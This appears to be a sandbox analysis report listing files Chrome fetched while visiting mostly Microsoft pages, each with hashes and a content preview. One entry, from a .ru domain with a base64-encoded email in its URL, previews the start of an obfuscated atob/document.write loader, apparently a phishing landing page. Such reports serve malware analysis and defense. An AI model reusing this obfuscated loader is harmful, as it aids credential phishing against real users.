                                                                                                                                    Preview:RIFFX...WEBPVP8 L........*....>...A...m...q--..|8..[....._..}8G........t....?.....05!x..K...O._.~.#...O...........2......7..Q5.x.!..dG.0..i....y.}I...xq..k.....+E"...]vm.)*.. .....tw.,`Cuo0i..*...jj.hc.[....L..)...X..Q.....&...eI5...F.o...\.q.g..X.ASR............ST~.P...g.-..#..t......b1.uM....|.Kg.Z?...8.........%\...(..7....m'..-E.i./ ......h.....+...X....H!d..L}...k......N.......E.W.F.k9.1.......1.....r.Yp@..D.F\.Y>r.<(..+~..nVW...}|u8.<.*.E....x"u....C.NX....J..8..L....... W....^.;A}D.....A..<;.B...DG.1h.~l.N...^.ls..c..)vxN.w.6.......q..........X...ew.O..gbW....1.6....KO..1.SE.v.......e..o....l.n.........I...?..J.sv..:..S..z..A.b....)..... .O...<P..~;..g..YI..:.`...>h..,..T.}..H..A._.?E.....c..cw.'.;#...|q..].).o.....y.......~^.......;.F..a.R.0...l.......|qp..1}.Z.W3.....0.....7l....7.....cx....P.$...{.1u.`.....
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ISO Media, AVIF Image
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):16236
                                                                                                                                    Entropy (8bit):7.979389780208157
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:E2F122B6CF191505D21556FF4AC5D4BF
                                                                                                                                    SHA1:E23204E91805EB6BDC53875BFC7ECEE5332DD153
                                                                                                                                    SHA-256:96789180C6B65FFD394E297D1D95C1A247371D56AA8C4995BE89D96298E56C56
                                                                                                                                    SHA-512:A1E39AB03FC7DCEF632F0BA52C31BDB965076E4A91F13A75152F5FC8D358C112D4602D383205581CACA85CDB49A86AB9366146F5FB3B6B781CB91CE1B413087A
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/accordian-bg-1600x758?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=1600&hei=758&qlt=95&fmt=png-alpha&fit=constrain"
                                                                                                                                    Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D...............>R...(iinf..........infe........av01Color....jiprp...Kipco....ispe.......@........pixi............av1C........colrnclx...........ipma.................>Zmdat.....*q.......2.|D.........3..u.x..#U....M..D..r...<1h..v\.~.=. F.....$..z...P.*7.D.}ynz...f..QCnt.. .l.......;.}U1..,E..G...v).E.W..V$n......w.3.....7.*........`r..O.9q.X..:fqP{.|.g....2...5`.}.<S.X9>zzZY.?...0aBK..F.l.*.\..{..6.....\:.7.*BR.......C-....y:8D({@k ~[!w...(...V.T[..a.OOe.)...."|....O.~...F.&h.r....|_.&...:.....b?.........<.....+.. .....W...^.......! ..}./..9..^...i.1...m.+Pg....p.....[..:A..V.e9...,..J...\Y....0...oLJ..K1L.....3...b.q...K......O1)4...cIUG.x..J..@._.r.D.o..K.G).8....ZNM.:..1.U..Au.e.v.S.N9..._....W.w.V.8.V.....0)......TM..8O.g.mc7.......E*.I,X[4gK.Q...Z.....;.0.:n.Z..."7..*Q......M]..x..^..2v.c.1. ......Bz8...R.!....^9%.5..!..v.M ..X....0...+HX?.5....%
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (889)
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):92962
                                                                                                                                    Entropy (8bit):5.482012211093105
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:35986A813756F39AB6B922979FFEDB03
                                                                                                                                    SHA1:C8E2213BBAFAF535DA9C6676F3DBA43449E4D15A
                                                                                                                                    SHA-256:E2D92BDAAD925C6D355331A338384EE3FF82492352975DD4EFDA791AEF4AB3F5
                                                                                                                                    SHA-512:289F1C432E73F611D54EB1130013174174222A0C5EEF8E2464C5FD51EE33DC702326EEECA80B2AAE213DB2FCCB149297FC37CC9A0B6CF6E928A66BC27843F930
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview:/*. jQuery JavaScript Library v3.5.1. https://jquery.com/.. Includes Sizzle.js. https://sizzlejs.com/.. Copyright JS Foundation and other contributors. Released under the MIT license. https://jquery.org/license.. Date: 2020-05-04T22:49Z. Sizzle CSS Selector Engine v2.3.5. https://sizzlejs.com/.. Copyright JS Foundation and other contributors. Released under the MIT license. https://js.foundation/.. Date: 2020-03-14.*/.'use strict';(function(H,Sa){"object"===typeof module&&"object"===typeof module.exports?module.exports=H.document?Sa(H,!0):function(Ta){if(!Ta.document)throw Error("jQuery requires a window with a document");return Sa(Ta)}:Sa(H)})("undefined"!==typeof window?window:this,function(H,Sa){function Ta(a,b,c){c=c||M;var d,f=c.createElement("script");f.text=a;if(b)for(d in Kc)(a=b[d]||b.getAttribute&&b.getAttribute(d))&&f.setAttribute(d,a);c.head.appendChild(f).parentNode.removeChild(f)}function Ia(a){return null==.a?a+"":"object"===typeof a||"function"===typeof a?db[Ob.call(a)]
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (4435), with no line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):4435
                                                                                                                                    Entropy (8bit):5.01164286821882
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:B1AEBA34FC9E5D3A7A310D366DF354BA
                                                                                                                                    SHA1:2D51F1CDEAC6900000385D6061C303C756880802
                                                                                                                                    SHA-256:3FF75711B9CBF7F8DD4D2D30DBD4C9040F4BED708B7457CAE922C24D18398B55
                                                                                                                                    SHA-512:B899C83A0466669FF948766988DA22ACB4953628D95476FE3D13991A363174A775043643DE74E5666357A318EF585D791B4BB3868F0A79C9EDEB96999789FD7D
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview:lpCb11905x18115({"id":1832741830,"name":"Power Platform Messaging English","description":"","json":{"logoAltText":"","scheme":{},"surveyAgentChatEnabled":false,"customVars":{},"postChatSurveyOnNonInteractiveChat":false,"sound":true,"smsPreFormId":"","surveyPreChatId":"315072652d636861742073757276657931343838333235343639353239","surveyPostChatEnabled":false,"language":"en-US","sendIconType":"arrow","widgets":false,"attachmentIcon":true,"clearHistory":true,"surveyOfflineId":"344f66666c696e652073757276657931343838333235343639323732","floatingWindow":false,"id":-1,"agentImage":false,"logoRedirectUrl":"","email":true,"agentAvatar":"true","surveyPreChatEnabled":false,"customStyle":{"v":"2.0","meta":{"fonts":{"1":"Arial,Helvetica,sans-serif"},"colors":{"11":"#f2f2f2","1":"#0363ad","2":"#000000","3":"#FFFFFF","4":"#b6b6b6","5":"#6D6E70","6":"#50e6ff","7":"#D2D2D2","8":"#243a5e","9":"#ffffff","10":"#6e6e6e"}},"config":{"transcript_bubble_agent_text":{"attrs":{"style":{"color":"{{colors.2}}","fo
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:C++ source, ASCII text
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):697
                                                                                                                                    Entropy (8bit):4.9687589816244095
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:D2F3218A374A1305FE262FC4BAEEDDD1
                                                                                                                                    SHA1:103721E516DC86A8EC433C6EA7C227BF7D954A55
                                                                                                                                    SHA-256:F76208F59F7E18EFB405361893B45B9DD7D0759BB5329AC664F39C02384982CD
                                                                                                                                    SHA-512:011062B7E77B5BBCACC6391C6E9873D4221E3474276F56D36EF29B78EA9E7C1C6C2021DA3D80D79C30E1675AC0CE62DC397C52051C7C1478054C02AF27BC7077
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview:/**. * OneCloud environment constants class.. */.class OneCloudEnvironmentConstants {.. /**. * OneCloud data connector AEM publisher variables.. * @readonly. */. static DataConnector = Object.freeze({. "endpoint": "/msonecloudapi",. queryParams: {}. });.. /**. * Microsoft API Prod Endpoint. * @readonly. */. static MicrosoftAPI = Object.freeze({. "endpoint": "https://www.microsoft.com/msstoreapiprod". });.. /**. * Appsource Request Header. * @readonly. */. static AppsourceAPI = Object.freeze({. "header": "Njg1YmM2MWI1ZTA4MWVlMzAxZTQwM2YxMzk2MjU4YzljMDE3Nzc0NDM2MWMyMzg3MGQwZjMwYzIxZWY0ODMwMQ==". });.}
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (801), with no line terminators
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):801
                                                                                                                                    Entropy (8bit):4.516855108976255
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:A8CBDEDEDE1CEA9268FD2B1EB9ECF24F
                                                                                                                                    SHA1:D2F9269106EB8C6975B960C87A719F60CB79730B
                                                                                                                                    SHA-256:2B85CCCC9D63C9E36194C572AD14038FDAF546BA864931CD30892072FB2EF532
                                                                                                                                    SHA-512:B065A6227974725A4BDACFB4545A640CE7193292D0A939FF29C3813362B83F19ABABD035EB41B1B6E0DA80D7655AF5197BFC1F83DED5993F648A09733598E619
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:https://accdn.lpsnmedia.net/api/account/60270350/configuration/domainprotection/refererrestrictions?cb=lpCb92609x88189
                                                                                                                                    Preview:lpCb92609x88189([{"enabled":true,"whiteList":["microsoft.com","*.microsoft.com","microsoftstore.com.cn","*.microsoftstore.com.cn","office.com","*.office.com","googleusercontent.com","bingplaces.com","translatoruser-int.com","liveperson.com","*.liveperson.com","liveperson.net","*.liveperson.net","lprnd.net","*.lprnd.net","lpsnmedia.net","*.lpsnmedia.net","static-assets.dev.fs.liveperson.com","*.azure.com","signup.azure.com","azure.com","*.moscnuat.com","*.lpnet.com","*.azurewebsites.net","*.geologic.al","*.microsoft365.com","microsoft365.com","checkout.microsoft365.com","stores.office.com","*.googleusercontent.com","*.bingplaces.com","*.translatoruser-int.com","lpnet.com","moscnuat.com","azurewebsites.net","geologic.al","*.checkout.microsoft365.com","*.stores.office.com"],"deleted":false}]);
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (3815)
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):3962
                                                                                                                                    Entropy (8bit):5.416634707598858
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:0CEBB336F49DD6BDAA1DA064ECE142F7
                                                                                                                                    SHA1:5901817C7A31E2C09BFA984EF33F3BF3E8E8A0D5
                                                                                                                                    SHA-256:9778E8FD34711B2A5661B23865984C5F1C4CBD45A5EBDDCDE8B108915C630055
                                                                                                                                    SHA-512:248D5F7A30B022A696C98B1FEAF5D15CAC4B304E9D3E9AEC413475CD4DC2BCCA82923C83606558EE4A859C193EC99D1333C1E3906B03D2393B2EA5D71318FB46
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview:// For license information, see `https://assets.adobedtm.com/5ef092d1efb5/2537c33769cb/fbfb7616f9aa/RCa0059efdf53d4c19be7d008a0a7abf0a-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/5ef092d1efb5/2537c33769cb/fbfb7616f9aa/RCa0059efdf53d4c19be7d008a0a7abf0a-source.min.js', "window.WebBlendsLoader=window.WebBlendsLoader||function(){function t(){for(var t=window.location.pathname,e=0;e<v.length;e++){var o=t.length-v[e].length;if(o=\"/\"===t[t.length-1]?o-1:o,t.substr(o,v[e].length)===v[e])return!0}return!1}function e(t){var e=document.createElement(\"script\"),o=document.createElement(\"div\");e.setAttribute(\"src\",f),e.setAttribute(\"async\",\"\"),e.addEventListener(\"load\",t),o.setAttribute(\"id\",c),o.style.display=\"none\",document.head.appendChild(e),document.body.appendChild(o)}function o(){var t={ParentElementId:c,Environment:a,Flight:w,ClientType:d};WebBlender.preLoadBlend(t)}function n(e){var o=window.location.origin+window.location.pathname;(p.test(o)||b.t
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):32
                                                                                                                                    Entropy (8bit):4.327819531114783
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:A8A3710424DC6E0DFF393C6964441BDB
                                                                                                                                    SHA1:E4978066791DD394BDDD174F2687A7CDD43442B2
                                                                                                                                    SHA-256:46CD047CC0D3D10776E2F50D4C9D55DB58BD97D7A95B7D691F53D4937C71CF00
                                                                                                                                    SHA-512:EE135EE50868E59853C8FE57A9471AE1FBBDE30A929D33B4A4D56200E70C93AFDFF0301EF7FEBC803258C2BA2DCBC183E632B2ADA1745D3C87C1EEB98E8DEE62
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:https://www.microsoft.com/etc.clientlibs/microsoft/components/content/universalheader/v1/universalheader/clientlibs/site.min.ACSHASHa8a3710424dc6e0dff393c6964441bdb.css
                                                                                                                                    Preview:[class*="z-"]{position:relative}
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 2750x1000, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):58314
                                                                                                                                    Entropy (8bit):7.972136313816049
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:85ED2E1EC55E11D3C996CE79821397C2
                                                                                                                                    SHA1:50EA39A97C5156EECFB5456E2778F4C8D9EC5ADA
                                                                                                                                    SHA-256:9F30C4B5CA95655555248699B6B1D65118EE36579BB966BA7CFE6E772F360749
                                                                                                                                    SHA-512:334BE8EC66B1BD0039A004D980495EFB0BBF2EC4A1A3A398BA5955928E5C806F41AEFB094B38EA7F43820300429B6C0F1E59D6FD1C44B0F40C709C53517497C9
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview:RIFF....WEBPVP8 .........*.......%...Il<..........H....q..k..Zi.?.......?.~....6.....J....i.......|o....a.x|..?]...o....?.z.<.......u...5.'.7.?..q...S....D...G.....?.>......{.....o....?..n..............4.......g...Oo.......f.....#.......s........a.....a...+...w.W........?A...7................s/.....?<.U.....?..K.[.../.o.z..w.................6.......?..m.........?...}..Q|..'._.../...?....M..._.................}.....?......_...7......~.z}~3....._..`...............................~........{..................?..._.>...?..O.<i.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.J..>..8.....n.....R.77..>d..1..1..1..1..1..1..1..1..1..1..1..1..1..1..1..1..1..1..1..1..1.y.=.}.o...b~h.rgY..z.N.F...
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (931), with no line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):931
                                                                                                                                    Entropy (8bit):5.870929051831436
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:61BB1D83E4E4AECD6BC23206BF23B033
                                                                                                                                    SHA1:ABE6ACF291ABC2101F8B9B913051A7DDEC2A16CF
                                                                                                                                    SHA-256:617BCC13B05C41A27BDCAB13BD49CB42DCCB714A6660DDCD92F11317E132F93A
                                                                                                                                    SHA-512:2F4568C53595D5B600DBBCD8198FD82E33E853FF69015D127BFB4DC7662B5A2E73FBD02D792E8992DEAD7A78D022B136381A22C2DA2CD3CA36A31FB7365EB069
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview:(()=>{if(!document.querySelector("#lp-origin-trial")){var i=document.createElement("meta");i.id="lp-origin-trial";i.httpEquiv="origin-trial";i.content="A77GUxMF2gPljjeX2xdlt25iXAGDqu3SWLRaxp24NcNGz++ZE9fkggbPexLArxAguTbk/8W5OtGUm5ki+fqC0wMAAACSeyJvcmlnaW4iOiJodHRwczovL2xwc25tZWRpYS5uZXQ6NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZyIsImV4cGlyeSI6MTcyNTQwNzk5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=";document.head.append(i)}if(!document.querySelector("#lp-origin-trial-2")){i=document.createElement("meta");i.id="lp-origin-trial-2";i.httpEquiv="origin-trial";i.content="A2t91t+aauUx3llVKUfxbR2uQKP2Thff9JfAXeVYED6Sv31GOcqWZkJpcG+y9Cg2vfnTtPYXjBK9hzq5DyXyVgAAAACTeyJvcmlnaW4iOiJodHRwczovL2xwc25tZWRpYS5uZXQ6NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZzIiLCJleHBpcnkiOjE3NDIzNDIzOTksImlzU3ViZG9tYWluIjp0cnVlLCJpc1RoaXJkUGFydHkiOnRydWV9";document.head.append(i)}})();
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):431
                                                                                                                                    Entropy (8bit):5.16775955111282
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:D79B55527411C8B4157E788A5D6A041C
                                                                                                                                    SHA1:16B3D69B7CB1A9827891A4C53A4CFD605FD9EC50
                                                                                                                                    SHA-256:E3A6022BCA2F8C91D8322A65AD6CAD1FAB3DC32560892E2C2817A0D47DDF2472
                                                                                                                                    SHA-512:2491498851E30A03DCB970C6B940F1055426BD5EA92505090018BE6800F6D557CBB2EDE741D8AC4023367AF140C7D0BE2276E3EC02ECBDE147C73C877DD04B5B
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:https://www.microsoft.com/content/dam/microsoft/final/en-us/microsoft-brand/icons/Build-a-report.svg
                                                                                                                                    Preview:<svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_2826_4525)">.<path d="M22.5 15H18V4.5H22.5V15ZM0 12H4.5V19.5H0V12ZM16.5 18H15V19.5H12V0H16.5V18ZM6 4.5H10.5V19.5H6V4.5ZM24 19.5V21H21V24H19.5V21H16.5V19.5H19.5V16.5H21V19.5H24Z" fill="#0078D4"/>.</g>.<defs>.<clipPath id="clip0_2826_4525">.<rect width="24" height="24" fill="white"/>.</clipPath>.</defs>.</svg>.
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (7549), with CRLF line terminators
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):19986
                                                                                                                                    Entropy (8bit):5.876952973592167
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:2460415A39BF517131F8C25C79E7079F
                                                                                                                                    SHA1:B6B49FD263D167969E86F663AB9491F53650F313
                                                                                                                                    SHA-256:01347725D8BDFD5EB81DF7454EFF296DA6A00B0DEF5CF56DF5B9E25F575A0D54
                                                                                                                                    SHA-512:720B9CF77F65893C899D3EADE36374DCC2E8C1F4D2D799479A676F96882793B206221C9EA4C66A511FD25FBE60249D64AC8965EF6ABB7F2ADAADDB897F3A5660
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:https://cia.vomivor.ru/SwWHk/%23dGVzbGFAdGVzbGEuY29t
                                                                                                                                    Preview: The way to get started is to quit talking and begin doing. -->..<script>....if(atob("aHR0cHM6Ly9qNy52b21pdm9yLnJ1L1N3V0hrLw==") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4NCiAgICA8dGl0bGU+JiM4MjAzOzwvdGl0bGU+DQogICAgPHN0eWxlPg0KYm9keSB7DQogIGJhY2tncm91bmQtY29sb3I6ICNmZmY7DQogIGhlaWdodDogMTAw
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (3164)
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):34401
                                                                                                                                    Entropy (8bit):5.567515913811421
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:5EE9E4E4E0A5FD39092E63D2D102B12B
                                                                                                                                    SHA1:1B66C81BD03006B327228854327C0FD3DF434BC2
                                                                                                                                    SHA-256:441B9F212CD322C6B039A2691F999EB2FAFC10FD645BCDB043A6DEE2DD052DA7
                                                                                                                                    SHA-512:3CA07A5D89931BCF6F0294C0727020A7FFE663487DB6ECC309FF69DDF59A0490BF85395E91241D40ED1DCF157C0784E6D6B53D8C92D52ED05823CCB6FBE1C470
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview:'use strict';(()=>{function L(n){var r=T[n];if(void 0!==r)return r.exports;r=T[n]={exports:{}};return U[n](r,r.exports,L),r.exports}var U={3770:(n,r,h)=>{n.exports=h(2494).default},2494:(n,r,h)=>{function f(x){return!x.response&&!!x.code&&"ECONNABORTED"!==x.code&&(0,a.default)(x)}function g(x){return"ECONNABORTED"!==x.code&&(!x.response||500<=x.response.status&&599>=x.response.status)}function p(x){return!!x.config&&g(x)&&-1!==t.indexOf(x.config.method)}function m(x){return f(x)||p(x)}function k(){return 0}.function l(x){var H=x[A]||{};return H.retryCount=H.retryCount||0,x[A]=H,H}function u(x,H){x.interceptors.request.use(function(E){return l(E).lastRequestTime=Date.now(),E});x.interceptors.response.use(null,function(E){var v=E.config;if(!v)return Promise.reject(E);var I=Object.assign({},H,v[A]),P=I.retries;P=void 0===P?3:P;var J=I.retryCondition;J=void 0===J?m:J;var M=I.retryDelay;M=void 0===M?k:M;I=I.shouldResetTimeout;I=void 0!==I&&I;var Q=l(v);if(J(E)&&Q.retryCount<P){Q.retryCount+
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (908)
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):1055
                                                                                                                                    Entropy (8bit):5.256219068414661
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:364DE364AFA70595D353442C0E6EB758
                                                                                                                                    SHA1:70D85948391BF6152D3D06569D1BAF5BE9D8F2B6
                                                                                                                                    SHA-256:493C73322C8F6C8F054177A4870315E5514A293026C26673990EF2E94430FDA1
                                                                                                                                    SHA-512:FC13F9B4756A6C27D85CC80BB4C0484F9A04EC9F82CC61E9AA2AF3400701179D9536B628A9BB522B62E1DF48E598C2C0F8367DFC85620B71B43EE218EC9BC684
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:https://assets.adobedtm.com/5ef092d1efb5/2537c33769cb/fbfb7616f9aa/RCe273b42c34d5427cb02b2d6cd022cac2-source.min.js
                                                                                                                                    Preview:// For license information, see `https://assets.adobedtm.com/5ef092d1efb5/2537c33769cb/fbfb7616f9aa/RCe273b42c34d5427cb02b2d6cd022cac2-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/5ef092d1efb5/2537c33769cb/fbfb7616f9aa/RCe273b42c34d5427cb02b2d6cd022cac2-source.min.js', "window.utag_cfg_ovrd=window.utag_cfg_ovrd||{},window.utag_cfg_ovrd.nocookie=!0,window.utf_event=function(){},utf_event.listen=function(e,n){document.addEventListener?document.addEventListener(e,n,!1):document.documentElement.attachEvent(\"onpropertychange\",(function(t){t.propertyName===e&&n()}))},utf_event.trigger=function(e){if(document.createEvent){var n=document.createEvent(\"Event\");n.initEvent(e,!0,!0),document.dispatchEvent(n)}else document.documentElement[e]++},window.requireEUCompliance=function(e){window.oa.tagging.data.store.get(\"haveEUConsent\")&&e()},window.waitForUTF=function(e,n){window.utfLoaded?n?window.requireEUCompliance(e):e():utf_event&&utf_event.listen(\"frameworkLoaded\",
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):9316
                                                                                                                                    Entropy (8bit):4.267140948442776
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:2B143BED0FF34BC70BC0703346F70E08
                                                                                                                                    SHA1:7FB14A8842293FD041C7C138285AC2F822AC4B4C
                                                                                                                                    SHA-256:C35BBDEE4A46BFBF552989E1126E1F09B454EB3DC2523376C38964BF6128BE86
                                                                                                                                    SHA-512:46BBF881243EC3C27046FCB66F9D8412B459CC7B6DA1ABF0DCB5F70D578F57E9A88D52431753B65F851892055AC17EDD9446E11BA67D7B0DA80B2B2615F67688
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview:// This function replaces popover data-island tags insertd in RTE via the popover plugin.(function () {. if (!window || !window.ocrReimagine) {. return;. }.. window.ocrReimagine.PopoverRichTextPlugin = new class {. popoverRichTextMountSelector = '.popover-rte-mount';. popoverMountSelector = '[data-mount="popover"]';.. isPopoverComponentEnabled() {. return !!(window.mwf?.Popover);. }.. isIconComponentEnabled() {. return !!(window.ocrReimagine?.Icon?.getInstances());. }.. /**. * Initialize popover elements with the class 'popover-rte-mount' by looking up inside the target element or entire document.. */. initializePopoverRichTextPlugin() {. if (!this.isPopoverComponentEnabled()) {. return;. }.. // Get all popover rich text elements.. const popoverRichTextElements = this.getPopoverRichTextElements();.. if (!popo
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (605)
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):179808
                                                                                                                                    Entropy (8bit):5.556656445593751
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:C3AEC3D03BC5447975E3EE25B53F6C32
                                                                                                                                    SHA1:353F68C0F6DF93888427E40135CF2DBF517F6FD0
                                                                                                                                    SHA-256:72FBAC0EA8A0FF74E7ABE2E24FB992885AC904A3C1C579387E97654DD9C535BA
                                                                                                                                    SHA-512:7D0E3CE67B84B7C1BBFC4511623426D68DE11D90BBEFF026013424C17D810CB59C75CD0754DD3A8AD9D3E27ED9620C9A6B92E2D7188C03845B0C3CC0E72951A1
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview:'use strict';(()=>{function kc(a){a=!1===(a=void 0===a?!0:a)?null:gg;return a||((a=(a=(a="undefined"!==typeof globalThis?globalThis:a)||"undefined"===typeof self?a:self)||"undefined"===typeof window?a:window)||"undefined"===typeof Sc.g||(a=Sc.g),gg=a),a}function se(a){function b(){}var c;if(hg)a=hg(a);else if(null==a)a={};else{if("object"!==(c=typeof a)&&c!==yc)throw new TypeError("Object prototype may only be an Object:"+a);a=(b.prototype=a,new b)}return a}function Sa(a,b){function c(){this.constructor=.a}if(typeof b!==yc&&null!==b)throw new TypeError("Class extends value "+String(b)+" is not a constructor or null");ig(a,b);a.prototype=null===b?se(b):(c.prototype=b.prototype,new c)}function jg(a,b){for(var c=0,d=b.length,e=a.length;c<d;c++,e++)a[e]=b[c];return a}function Gb(a,b){return a&&ud.prototype.hasOwnProperty.call(a,b)}function vd(a){return a&&(a===ud.prototype||a===Array.prototype)}function te(a){return vd(a)||a===Function.prototype}function lc(a){if(a){if(Tc)return Tc(a);var
